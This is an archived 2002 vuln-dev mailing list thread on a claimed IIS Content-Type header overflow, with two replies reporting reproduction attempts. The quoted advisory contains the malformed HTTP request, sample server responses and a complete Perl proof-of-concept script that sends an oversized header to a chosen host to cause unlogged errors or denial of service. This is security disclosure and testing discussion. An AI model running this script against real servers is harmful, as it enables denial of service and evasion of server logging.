[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RES: IIS Vulnerability Content-Type overflow [DH-7XC4RA3]



Just tried it.

Got the 500 server error in the logs with a size of 30K. No noticeable CPU increase, but got the "Not enough storage is available to complete this operation." in the log.

Also tried 65535 and NO record found in logs whatsoever.


Romulo M. Cholewa
Home : http://www.rmc.eti.br
Forum: http://zeus.rmc.eti.br/forum
PGP Keys Available @ website.

  "You cannot stop the wind, but you may change your sailing."  
                                                                
                                                                


]-----Mensagem original-----
]De: Dan Hanson [mailto:dhanson@xxxxxxxxxxxxxxxxx] 
]Enviada em: terça-feira, 3 de dezembro de 2002 20:10
]Para: at4r
]Cc: vuln-dev@xxxxxxxxxxxxxxxxx
]Assunto: Re: IIS Vulnerability Content-Type overflow
]
]
]Hi, We were interested in testing this out and were unable to 
]reproduce the results that you say you saw. Taking your 
]exploit, the only way we could get any reaction is by sending 
]multiple small size packets in a loop. In this case, it is 
]more of a traditional packet based DoS
]
]You are right about it not logging the connection though.
]
]I tried both a sp2 patched and a fully patched Windows 2000 
]Server machine. What are the specific values you pass the perl 
]program to cause the DoS situation? Does the service crash? 
]does the memory usage spike?
]
]I also tried ensuring that the requested resource was 
]available, and changed protocol specs.
]
]Thanks
]
]D
]
]On Mon, 2 Dec 2002, at4r wrote:
]
]> ------------------------ 3wdesign.es security 
]------------------------
]> Advisory: IIS Vulnerability Content-Type overflow
]> discovered:  November 26, 2002
]> Platforms:  windows NT/2000/xp ( iis 4.0 iis 5.0 iis 5.1 ... 
]¿ 6.0 ? )
]> Vendors:   Microsoft Corporation (http://www.microsoft.com)
]> Andrés Tarascó ( at4r at 3wdesign.es ) discovered this vulnerability
]> ------------------------ 3wdesign.es security 
]------------------------
]>
]>
]> while testing a few days ago how to reproduce the lastest mdac rds 
]> vulnerability i found that a specially malformed http request to an 
]> IIS Webserver can allow a buffer overflow. The bug is in the 
]> Content-Type string and seems that is not the same vulnerability 
]> founded in mdac RDS few days ago by foundstone because IIS 
]webservers 
]> with all security patches are vulnerable to this.
]>
]> GET /foo HTTP/1.0
]> Host: hax
]> Content-Type: application/x-www-form-urlencoded
]> Content-Length: 56
]> Accept-Language: en
]> Content-Type: 
]> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...about
]> 32700....]
]>
]>
]> When lenght of both content-type strings is ~> 32768 there is an 
]> overflow, and requests are not being logged by IIS.
]>
]> here is an example of this bug:
]>
]> aT4r@server:~$ ./test.pl 192.168.0.69 80 32684
]>
]> HTTP/1.1 500 Server Error
]> Server: Microsoft-IIS/5.0
]> Date: Tue, 26 Nov 2002 22:21:56 GMT
]> Content-Type: text/html
]> Content-Length: 119
]>
]> <html><head><title>Error</title></head><body>Not enough storage is 
]> available to complete this operation. </body></html> aT4r@server:~$
]>
]>
]> aT4r@server:~$ ./test.pl 192.168.0.69 80 150000
]>
]> HTTP/1.1 500 Server Error
]> Server: Microsoft-IIS/5.0
]> Date: Tue, 26 Nov 2002 22:22:30 GMT
]> Content-Type: text/html
]> Content-Length: 98
]>
]> <html><head><title>Bad Request</title></head><body><h1>HTTP/1.1 400 
]> Bad Request</h1></body></html> aT4r@server:~$
]>
]>
]> aT4r@server:~$ ./test.pl 192.168.0.69 80 300000 aT4r@server:~$
]>
]>
]>
]> i have an easy perl script to test this:
]>
]> [test.pl]--------------------------
]> #!/usr/bin/perl -W
]> # Its possible to send requests to an IIS webserver without 
]being logged.
]> # This allow an attacker to launch a DoS attack against the 
]server with
]> # multiple requests having a big CPU Consume.
]> # tested under IIS 4.0,  IIS 5.0 and 5.1
]> # Email: at4r AT 3wdesign.es
]> # Discovered: 26 november 2002
]> # Greetings to my friends: Tarako, Drakar, |tyr| , [back] , 
]croulder, ppp0 ,
]> Contraste.
]>
]> require IO::Socket;
]>
]> if ($#ARGV<1)
]> {
]>  print "\n use: ./test.pl IP Port N!! \n\n";
]>  exit;
]> }
]>
]> printf"\n ----------------------------------------------------\n";
]> print "|                IIS Testing                         |\n";
]> printf" ----------------------------------------------------\n\n";
]>
]>
]> $cabecera = "GET /foo HTTP/1.0\n".
]>    "Host: hax\n".
]>    "Content-Type: application/x-www-form-urlencoded\n".
]>    "Content-Length: 56\n".
]>    "Accept-Language: en\n";
]>
]> $sock = new IO::Socket::INET (PeerAddr => "$ARGV[0]",
]>                                PeerPort => "$ARGV[1]",
]>                                Proto    => "tcp");
]>
]> die "\nCould not connect to $ARGV[0] : $!\n" unless $sock;
]>
]> print $sock "${cabecera}";
]> $bof = `perl -e "print '\x90' x $ARGV[2]"`;
]> print $sock "Content-Type: ${bof}\n\r\n\r\n";
]>
]> while (<$sock>) {
]>   print "${_}";
]>  }
]>
]> printf "\n";
]>
]> --------------------------[test.pl]
]>
]>
]> I dont Know if all webservers are vulnerable to this and if 
]its possible to
]> execute code, so please take a look.
]> vendor was contacted but i got no answer.
]>
]> if you got more information please send me an email to: at4r 
]at 3wdesign.es.
]>
]
]
]